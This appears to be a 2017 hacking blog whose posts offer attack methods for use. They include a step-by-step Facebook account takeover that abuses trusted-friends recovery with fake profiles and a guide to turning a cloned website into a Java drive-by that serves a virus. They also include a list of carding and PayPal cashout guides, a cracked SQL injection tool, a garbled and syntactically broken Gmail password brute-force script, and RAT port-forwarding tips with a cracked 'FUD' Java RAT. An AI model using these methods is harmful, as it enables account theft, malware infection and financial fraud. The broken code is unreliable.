Saturday, February 25, 2017

Easiest way to Hack facebook 2017

2:32 PM Leave a Reply
Easiest way to Hack facebook 2017
1. Go to Facebook and click Forgot your Password ?

2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.

3. After entering everything check it again and click on search.

4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying

No Longer Access to These click that one.

5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.

6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.

7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account.

8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method

 Read More at :

How To Clone Any Site And Turn It Into A Java Drive By !

2:29 PM Leave a Reply
How To Clone Any Site And Turn It Into A Java Drive By !
Once Downloaded you will need to extract it with a unzipping program such as 7 ZIP or Win Rar etc.

1. Find the website you would like to clone. (Use Google Chrome For This!)

2. Once your on the site, Right Click and click "Save As" and then put into the folder you have just extracted in the same folder as "client.jar"

3. Rename the file you got from the website you just saved to "index"

Pictures of this story:

4. Right click on index.html and press open with -> Notepad

5. Now you should see all the code for the website, scroll to the bottom of the text and make a few spaces and put the code in below.

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">

Where it says yoursite.exe, you need to put a direct link to your file so upload your virus to: and then add the direct link to the applet code.

6. Save your website in notepad by pressing either CTR + S or File-> Save.

Pictures of the story:

You have now successfully created a working java drive by, when you open the index page it should look like this:

Now you need to upload it to a web site so you are going to need a domain + hosting

Free hosting that doesn't delete your site: (I host mine their)

 Read More at :

200 DeepWeb Guides [PP,CC,GENERAL]

2:25 PM Leave a Reply
200 DeepWeb Guides [PP,CC,GENERAL]

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Bank Transfers using Fulls/Bank Transfers done the right way.pdf
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Carding in general - 71 Documents/1360401863673.pdf
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Carding in general - 71 Documents/How to cashout CC's with anon credit card(confirmed working).pdf
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Carding in general - 71 Documents/Paypal Cashout 2(working).pdf
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3 Cash Methods.pdf
66 CC Tutorials.pdf
Converting PP and CC into BTC.pdf
How to Be Invisible/
How to Be Invisible/How to be Invisible.pdf
Places to go on the Deep Web + Invite Codes/
Places to go on the Deep Web + Invite Codes/Deep Web Market Places and their Invite Codes.txt
README_FIRST_____Do not get SCAMMED.rtf
Using DBAN to Wipe a Hard Drive/
Using DBAN to Wipe a Hard Drive/.DS_Store
Using DBAN to Wipe a Hard Drive/Using DBAN or the Ultimate Boot CD.rtf
Using Stripe - CC to Bank.pdf
VPN Sock TOR Tutorial/
VPN Sock TOR Tutorial/Bootable and Encrypted Whonix VM on 8GB USB Stick+VPN (1).pdf
VPN Sock TOR Tutorial/vpn tor sock.pdf
Various Resources
Verify PP accounts with ETRADE.pdf


Havij v1.16 Pro Portable Cracked

2:20 PM Leave a Reply
Havij v1.16 Pro Portable Cracked
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij That Makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Supported Databases with injection methods:
MsSQL 2000/2005 with error
MsSQL 2000/2005 no error union based
MsSQL Blind
MySQL time based
MySQL union based
MySQL Blind
MySQL error based
MySQL time based
Oracle union based
Oracle error based
PostgreSQL union based
MsAccess union based
MsAccess Blind
Sybase (ASE)
Sybase (ASE) Blind
HTTPS support
Proxy support
Automatic database server detection
Automatic type detection (string or integer)
Automatic keyword detection (finding difference between the positive and negative response)
Automatic scan of all parameters.
Trying different injection syntaxes
Options for replacing space by /**/,+,… against IDS or filters
Avoids using strings (bypassing magic_quotes and similar filters)


Python - gmail account cracker

2:18 PM Leave a Reply
Python - gmail account cracker
imports smtplib
imports argparse

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="Target")
parser.add_argument("-f", "--file", help="Password File")
args = parser.parse_args()
stop = False
if and args.file:
     stop = True
     printf "Gmail Account Cracker"
     passwordfile = open(args.file, "r")
     for line in passwordfile:
            print "Attempted Password: '+line
            server = smtplib.SMTP('')
                server.login(, line)
                print '[!] Password: '+line
                a = raw_input()
            except smtplib.SMTPAuthenticationError:
if '__main__' == __name__:
     if stop == False:
            printf 'Error, correct syntax: python -t <target> -f <passfile>'

Tuesday, February 14, 2017

Super Easy Port forwarding. ★UPnP

12:10 PM Leave a Reply
Super Easy Port forwarding. ★UPnP
When i first started using RATs i had no idea how to portforward. It seemed completely alien to me. The HF community sent me in the direction of Darkcomet as it had the great advantage of built in UPnP...

Universal Plug and Play (Forwards your port automatically if your Router supports it)

the worry of having to manually change my router's settings was now gone!
for a while anyway...

The time eventually came for me to upgrade to paid software for more features and a more stable server. I Still had no idea how to portforward so i searched online for a program that replaced Darkcomets great port forwarding tool.

Here's the program i found and still use to this day

"UPnP Port Forward Utility - ver 1.00"

Why? Because it works perfectly, takes about 15 seconds to forward a new port, and i currently have no need to use anything else.

The Main screen above shows all of your open ports and the program behind it.

After clicking "add new entry" you will be prompted to enter these details. Give the portforward a name (Blackshades server/Testing port) etc.. and then "save changes and exit"

Foolproof Tips in Spoiler
Internal IP address will be shown as one of your "destination ip's" on the mainscreen.
External and internal port should be set as the same number.
All other settings can be left as default

virus scan - fe28ca386a7890/analysis/


Free VPS Server

12:00 PM Leave a Reply
Free VPS Server
Free VPS Server

1 Free Vps 1GB RAM
2 Free Domain name
3 Free webhosting

The most affordable free premium VPS Hosting on the Internet! The most affordable free premium VPS Hosting on the Internet!. ... All of our free plans are fully customisable to your needs.


Sunday, February 12, 2017

Saturday, February 11, 2017


5:01 PM Leave a Reply
Themida is a powerful software protection system designed for software developers who wish to protect their applications
against advanced reverse engineering and software cracking. Themida uses the SecureEngine® protection system to achieve
its goals, making it really difficult to break using the traditional and newest cracking tools.
Themida has been designed to completely stop novice and advanced crackers from cracking an application.
That will avoid a considerable revenue loss from the distribution of cracked applications. Developers do not need any
source code changes or programming experience to protect their applications with Themida.
This document explains about the advantages of using Themida and how to use it to protect your applications with the
most secure techniques available against advanced cracking.

Themida []
[+] Added DOLPHIN virtual machine
[+] Added EAGLE virtual machine
[+] Improved speed generating internal virtual machines
[+] Improved speed virtualizing code
[+] Added support for DPI scaling in User Interface
[+] x64: Fixed heap memory leak on exit in protected 64-bit DLLs
[+] Fixed exception when applying taggant in a blocked file


Avira Phantom VPN Pro V2.5.1 (Virustotal Scanned)

4:58 PM 1 Comment
Avira Phantom VPN Pro V2.5.1 (Virustotal Scanned)
How To Install

1. Run vpninstaller.exe

2. Wait For It To Fully Install

3. Open Task Manger (CTRL+ALT+Delete)

4. End Task For Avira.VpnService

5. Go To C:\Program Files (x86)\Avira\VPN

6. Delete Avira.VpnService

7. Go To the Crack Folder

8. Drag Or Copy The Avira.VpnService To The VPN Folder (AKA C:\Program Files (x86)\Avira\VPN)

9. Run The Desktop Icon Avira Phantom VPN

10. ENJOY Cool

[CRACK] JCage || Java RAT || Cross Platformed || FUD || Stable ||

4:54 PM Leave a Reply
[CRACK] JCage || Java RAT || Cross Platformed || FUD || Stable ||
So the developer of this tool came off as a bit of a douche when I gave him a suggestion, that is why i am releasing this to the public. I strongly suggest staying away from this RAT as it is terrible but feel free to try it out and be disapointed :)

This is BETA stage for JCage, a load of more updates to come, at this point in time JCage is very stable and very functional.
